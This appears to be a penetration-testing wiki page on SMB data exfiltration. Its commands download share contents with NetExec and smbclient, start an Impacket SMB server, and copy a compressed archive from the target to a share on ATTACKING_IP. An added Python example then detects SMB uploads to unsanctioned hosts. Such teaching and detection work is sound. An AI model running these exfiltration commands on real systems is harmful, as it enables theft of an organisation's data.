
# Exfiltration Over SMB

## Theory

SMB (Server Message Block) exfiltration refers to the unauthorized extraction or transfer of data from a compromised network or system using SMB protocols. Attackers can leverage SMB to transfer sensitive or valuable information from an organization's network to an external location.

## Practice

### Exfiltrate Share's Content

{% tabs %}
{% tab title="NetExec" %}
Tools like [NetExec](https://github.com/Pennyw0rth/NetExec) can be used to recursively download an SMB share's content.

```bash
netexec smb $IP -u $USERNAME -p $PASSWORD -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=999999
```

The previous command generates a JSON file listing the accessible files in each share. We can use `jq` to parse this JSON output.

```bash
cat 10.10.10.111.json | jq '. | map_values(keys)'
```

{% endtab %}

{% tab title="smbclient" %}
Tools like [smbclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) can be used to recursively download an SMB share's content.

```bash
# In an smbclient interactive session
recurse ON
prompt OFF
mget *
```

{% endtab %}
{% endtabs %}

### Exfiltrate Data

{% tabs %}
{% tab title="Windows" %}
To exfiltrate the data from the target, we can compress the data and transfer it via an SMB shared folder hosted on our attacking host.

First, start an SMB server on your attacking host using [smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py) from Impacket:

```bash
smbserver.py -smb2support /local/share/path ShareName -user veresk -password psswd
```

On the target, compress the target data:

```powershell
Compress-Archive -Path /path/to/compress -DestinationPath exfi.zip
```

From the target, mount the shared folder and copy the files to it:

```powershell
# Mount the smb share
net use Z: \\ATTACKING_IP\ShareName psswd /USER:veresk

# Exfiltrate ZIP file
copy exfi.zip Z:\
```

{% endtab %}
{% endtabs %}
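
On the defensive side, the copy to a share hosted on a machine that is not one of the organization's file servers appears in network flow data as SMB client traffic to an unsanctioned host. The following is an added detection example, not part of the original page; the CSV layout, the allowlist, the byte threshold and the function name are assumptions, and the flow records are constructed.

```python
import csv
import io
from collections import defaultdict
from ipaddress import ip_address, ip_network

SMB_PORTS = {139, 445}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumption: inventory of sanctioned SMB servers (file servers, domain controllers).
SANCTIONED_SMB_SERVERS = {ip_address("10.0.0.10"), ip_address("10.0.0.20")}
UPLOAD_THRESHOLD_BYTES = 5 * 1024 * 1024  # assumed tuning value

# Constructed sample flow records; bytes_out is what the client sent.
SAMPLE_FLOWS = """src,dst,dport,bytes_out
10.0.5.23,10.0.0.10,445,120000
10.0.5.41,10.0.9.77,445,4000000
10.0.5.41,10.0.9.77,445,9000000
10.0.5.50,203.0.113.8,445,2048
10.0.5.60,10.0.0.20,443,90000000
"""


def find_suspicious_smb_uploads(flow_csv, allowlist=SANCTIONED_SMB_SERVERS,
                                threshold=UPLOAD_THRESHOLD_BYTES):
    """Return alerts for SMB client traffic to hosts outside the allowlist."""
    totals = defaultdict(int)
    for row in csv.DictReader(io.StringIO(flow_csv)):
        if int(row["dport"]) not in SMB_PORTS:
            continue
        if ip_address(row["dst"]) in allowlist:
            continue
        totals[(row["src"], row["dst"])] += int(row["bytes_out"])

    alerts = []
    for (src, dst), sent in sorted(totals.items()):
        external = not any(ip_address(dst) in net for net in INTERNAL_NETS)
        # SMB leaving the internal ranges is always reported; SMB to an
        # unsanctioned internal host only once the upload volume is large.
        if external:
            reason = "SMB to external host"
        elif sent >= threshold:
            reason = "large upload to unsanctioned internal SMB host"
        else:
            continue
        alerts.append({"src": src, "dst": dst, "bytes_out": sent, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_smb_uploads(SAMPLE_FLOWS):
        print(alert)
```

During an internal engagement the receiving host can sit inside RFC 1918 space, so the allowlist comparison carries more weight than the external-address check.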

